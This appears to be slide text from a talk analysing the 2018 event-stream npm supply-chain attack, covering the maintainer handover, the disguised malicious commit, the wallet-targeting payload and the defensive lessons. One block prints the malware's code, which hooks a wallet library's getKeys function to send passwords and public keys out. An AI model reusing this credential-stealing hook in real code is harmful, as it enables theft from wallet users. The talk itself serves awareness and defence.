November 20th, 2018
dominictarr
Event stream
2015: 16M downloads
2018: 70M downloads
Summer 2018: right9ctrl proposes to become owner
GitHub issue
Pull requests
Pull requests
October 28th, 2018
GIT_COMMITTER_DATE=”$(date)”
git commit –amend –no-edit –date “$(date)”
What does it do?
- Update of
index.min.js - Add AES256 encrypted file shown as a test fixture
- Update version number 3.3.5 -> 3.3.6
- Triggers update for ~1.5-2M developers
November 20th, 2018
How does it work?
- Looks for Bitpay wallets with a device object (browsers/Electron)
- Parses ids
- Takes all wallets > 100 bitcoins (~600K€)
- Sends it to a malaysian server
```js
Credentials.prototype.getKeys = function(password) {
// code to decrypt password and send it
return keys;
};
```
```js
const Credentials = require("bitcore-wallet-client/lib/credentials.js");
// Intercept the getKeys function in the Credentails class
Credentials.prototype.getKeysFunc = Credentials.prototype.getKeys;
Credentials.prototype.getKeys = function(keyLookup) {
const originalResult = this.getKeysFunc(keyLookup);
try {
if (global.CSSMap && global.CSSMap[this.xPubKey]) {
delete global.CSSMap[this.xPubKey];
sendRequests("p", keyLookup + "\t" + this.xPubKey);
}
} catch (err) {}
return originalResult;
}
```
Consequences
- BitPay says their app is not vulnerable, but update it anyway
- NPM takes control to remove malicious code
- Developer apologizes, but was bored of the project and community
Conclusion
- Be careful of dependencies you add
- Look at its license: MIT = NO GUARANTY
- Keep your dependencies up to date
- Use GitHub security tab
Links
